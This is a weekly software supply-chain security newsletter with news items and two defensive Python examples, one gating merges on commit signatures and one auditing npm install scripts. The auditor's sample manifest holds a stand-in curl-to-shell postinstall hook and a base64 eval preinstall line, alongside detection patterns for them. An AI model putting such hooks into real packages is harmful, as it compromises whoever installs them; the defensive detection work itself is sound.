
CramHacks Chronicles #71: Weekly Cybersecurity Newsletter!

I have a new Job! OSS usage trends, us-east-1.com DNS insights, CVEs for EOL versions, Palantir's security practices, OSS health checks, OSV-Scanner v2.0.0-beta1

Happy Monday, all!

This week, I started my new position at GitHub 🥳. Given my passion (is passion just a more friendly word for obsession?) for software supply chain security, I couldn't be more excited.

I feel wildly energized about work after being without a 9-5 job for over a month. I can't help but wonder how long this will last, but hopefully, it will be a long time 🍻.

Newsletter 

Open Source Usage Trends and Security Challenges Revealed in New Study
The Linux Foundation has published Census III, its third study of how open source software is used. Key findings include:

  • 7% of Python developers still use Python 2.

  • There's a recognized need for widespread adoption of a standardized naming schema for software components (e.g., package URL, PURL).

  • The most widely used projects are often maintained by only a handful of contributors. Of 47 of the top 50 non-npm projects, 17% have one developer accounting for more than 80% of commits; that rises to 40% of projects when two developers together account for more than 80%.

Buying us-east-1[.]com: A Look at Security and DNS Traffic
Most people know us-east-1 as an AWS region, but the matching domain us-east-1[.]com was unregistered until Gabriel Koo bought it in December 2021. This blog details what he observed from the more than 45,000 DNS queries the domain receives each day. Fortunately, Gabriel is on the good side!

How Palantir Secures Source Control
Palantir has an ongoing series covering how it is improving its software supply chain security. The latest issue, #3, covers commit signing, code-review enforcement, GHE (GitHub Enterprise) permission management, static code analysis, and their secure release flow.

👋 The in-house built workflows for commit signing and validation were most interesting to me. Developers must use a YubiKey with touch policy enforced to sign all commits, which are validated before a PR is allowed to merge.
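To show what a "validate every commit before merge" gate boils down to, here is an added example (my own, not Palantir's tooling). It consumes the output of `git log --format='%H %G? %GF' <base>..<head>`, where `%G?` is git's signature status code and `%GF` the fingerprint of the signing key, and refuses the merge unless every commit in the range carries a good signature from an allow-listed key. The allow-list fingerprints and the sample log are constructed placeholders.

```python
"""Gate a pull request on verified commit signatures.

Added example, not Palantir's tooling. Parses the output of
    git log --format='%H %G? %GF' <base>..<head>
and refuses the merge unless every commit has a good signature from an allow-listed key.
The fingerprints and the sample log are constructed placeholders.
"""
from dataclasses import dataclass
import subprocess

# %G? codes from git-log(1): G good, B bad, U good but untrusted key, X good but expired,
# Y good but made by an expired key, R good but made by a revoked key, E cannot check
# (e.g. key missing), N no signature at all. Only 'G' is acceptable for a merge gate.
GOOD = "G"

# Constructed allow-list: fingerprints of the signing (sub)keys issued to developers.
# With a YubiKey-held subkey, %GF reports the subkey fingerprint; use %GP in the git
# command instead if you prefer to allow-list primary-key fingerprints.
ALLOWED_FINGERPRINTS = {
    "0123456789ABCDEF0123456789ABCDEF01234567",
    "FEDCBA9876543210FEDCBA9876543210FEDCBA98",
}


@dataclass(frozen=True)
class CommitSignature:
    sha: str
    status: str       # the %G? code
    fingerprint: str  # empty when the commit is unsigned


def parse_signature_log(text: str) -> list[CommitSignature]:
    """Parse '<sha> <status> [<fingerprint>]' lines; unsigned commits have no third field."""
    commits = []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        sha, status = parts[0], parts[1]
        fingerprint = parts[2] if len(parts) > 2 else ""
        commits.append(CommitSignature(sha, status, fingerprint.upper()))
    return commits


def find_signature_problems(log_text: str, allowed: set[str]) -> list[str]:
    """Return one reason per unacceptable commit; an empty list means the range may merge."""
    problems = []
    for c in parse_signature_log(log_text):
        if c.status != GOOD:
            problems.append(f"{c.sha[:12]}: signature status {c.status!r}, need {GOOD!r}")
        elif c.fingerprint not in allowed:
            problems.append(f"{c.sha[:12]}: signed by non-allow-listed key {c.fingerprint}")
    return problems


def pr_may_merge(log_text: str, allowed: set[str] = ALLOWED_FINGERPRINTS) -> bool:
    return not find_signature_problems(log_text, allowed)


def git_signature_log(base: str, head: str) -> str:
    """Run the real git command against the current repository (not used by the sample run)."""
    result = subprocess.run(
        ["git", "log", "--format=%H %G? %GF", f"{base}..{head}"],
        check=True, capture_output=True, text=True,
    )
    return result.stdout


# Constructed sample: three commits in a PR range. The second is unsigned, the third is
# well signed but by a key that is not on the allow-list.
SAMPLE_LOG = """\
3f2a9c1d7e4b5a6f8d9c0b1a2e3f4d5c6b7a8e9f G 0123456789ABCDEF0123456789ABCDEF01234567
9c1b4e7a2d5f8b0c3e6a9d2f5b8e1c4a7d0f3b6e N
7e4d1a8b5c2f9e6d3a0b7c4f1e8d5a2b9c6f3e0d G DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF
"""

if __name__ == "__main__":
    for problem in find_signature_problems(SAMPLE_LOG, ALLOWED_FINGERPRINTS):
        print("BLOCK:", problem)
    print("mergeable:", pr_may_merge(SAMPLE_LOG))
```

One practical caveat: in CI the runner must import the developers' public keys before calling `git log`, otherwise a perfectly good signature shows up as `U` (unknown validity) or `E` (key missing) and the gate blocks it. Keep the allow-list in a repository the developers cannot push to, or the check protects nothing.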

CVEs for End of Life?
The Node.js project recently announced that it would issue a CVE for end-of-life release lines. My opinion is below, but I enjoyed reading Josh Bressers's take on the different perspectives, packed full of relatable comedy.

👋 This goes against CVE rules, which concludes my opinion. I suspect that in 2025, we will see more controversial practices that will challenge the program (e.g., the Linux kernel assigning CVEs to all bug fixes).

Datadog threat roundup: top insights for Q4 2024
Based on GuardDog scan results, Datadog found that 80% of malicious PyPI packages overrode setuptools' setup() function in setup.py. They also report that 90% of malicious npm packages used pre- or post-install scripts declared in package.json.

👋 Great report! However, these statistics feel inflated for several reasons, the most obvious being that they're the easiest to find. What's nice is that the latest release of pnpm blocks these scripts by default! Additionally, Liran Tal released a blog post on npm best practices for handling pre- and post-install scripts.
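Since install-time scripts are the mechanism behind the npm figure above, here is an added example (mine, not Datadog's GuardDog and not a pnpm feature) of the check a practitioner would run over a package's manifest: it lists the hooks npm executes automatically when the package is installed as a dependency and flags a few download-and-execute patterns those scripts commonly use. The two manifests at the bottom are constructed, and the pattern list is a starting point, not a complete detector.

```python
"""Flag npm lifecycle scripts that would run on install.

Added example, not Datadog's GuardDog and not a pnpm feature. Inspects a package.json
for the hooks npm runs when the package is installed as a dependency and reports
download-and-execute patterns in them. The sample manifests are constructed.
"""
import json
import re

# Hooks npm runs automatically for an installed dependency. 'prepare' also runs for
# git and local-path dependencies, so it is included.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns worth a closer look: fetching remote content, decoding obfuscated payloads,
# or handing a string to the interpreter. Heuristics only; absence proves nothing.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads remote content"),
    (re.compile(r"https?://"), "references a URL"),
    (re.compile(r"\bbase64\b|\batob\(|from_base64"), "decodes base64"),
    (re.compile(r"\beval\b|node\s+-e\b"), "evaluates code from a string"),
]


def audit_package_json(manifest_text: str) -> list[str]:
    """Return one finding per install-time hook; an empty list means nothing runs at install."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    name = manifest.get("name", "<unnamed>")
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        flags = [why for pattern, why in SUSPICIOUS if pattern.search(command)]
        detail = f"; {', '.join(flags)}" if flags else ""
        findings.append(f"{name}: {hook} runs {command!r}{detail}")
    return findings


# Constructed sample manifests: one with only developer scripts, one with install hooks.
BENIGN = json.dumps({
    "name": "left-pad-ish",
    "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc"},
})

SUSPECT = json.dumps({
    "name": "totally-legit-utils",
    "version": "0.0.1",
    "scripts": {
        "postinstall": "curl -s https://example.invalid/p.sh | sh",
        "preinstall": "node -e \"eval(Buffer.from(process.env.P,'base64').toString())\"",
    },
})

if __name__ == "__main__":
    for text in (BENIGN, SUSPECT):
        for finding in audit_package_json(text) or ["no install-time scripts"]:
            print(finding)
```

For npm itself, the blanket mitigation is `ignore-scripts=true` in `.npmrc`: dependencies' lifecycle scripts no longer run during install, while an explicit `npm run build` or `npm test` still runs the named script (only its pre/post hooks are skipped), so packages that genuinely need a post-install build step have to be handled case by case.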

Health Check-ups on OSS Projects: Managing Risks while Promoting (Re)use
Johan Linåker discusses takeaways from his research paper, How to Assess the Health of Open Source Software Dependencies in an Organization's Intake Process: Insights from an Interview-survey and Case Study.

👋 I haven't had a chance to read this in depth, but I'm excited to see research on this topic, a proposed solution, and a case study!

Curl Project: CVSS is dead to us
Curl's Daniel Stenberg explains that the project uses its own severity ratings and doesn't include a CVSS score in its CVE submissions. That's fine in itself; however, it has been pointed out that CISA, acting as an Authorized Data Publisher (ADP), then enriches those CVEs with CVSS scores of its own, computed from minimal context and without the maintainers' expertise.

👋 Filippo Valsorda points out in a Bluesky thread that the Go Security team experiences the same problem.

Attacks on Maven proxy repositories
GitHub Security Lab's Michael Stepankin shows that many vulnerabilities still exist in the popular Maven package repositories Nexus, JFrog, and Reposilite. The CVEs reported in the blog target 'proxy mode', in which the repository fetches packages from an upstream source, stores them locally, and serves them to clients.

👋 Check out Michael's Ekoparty talk here!

OSV-Scanner v2.0.0-beta1 is ready!
👋 This was just announced, so I haven't had time to experiment with it. However, layer-aware container scanning that supports Debian, Ubuntu, and Alpine container images sounds pretty sweet.

Until Next Time! 👋

Hey, you made it to the bottom. Thanks for sticking around!

Questions, ideas, or want to chat? Slide into my inbox! 💌

Don't hesitate to forward if someone could benefit from this.

See you next Monday!
-Kyle

P.S. CramHacks has a Supporter tier! You can upgrade here to support CramHacks and its free weekly content 😃.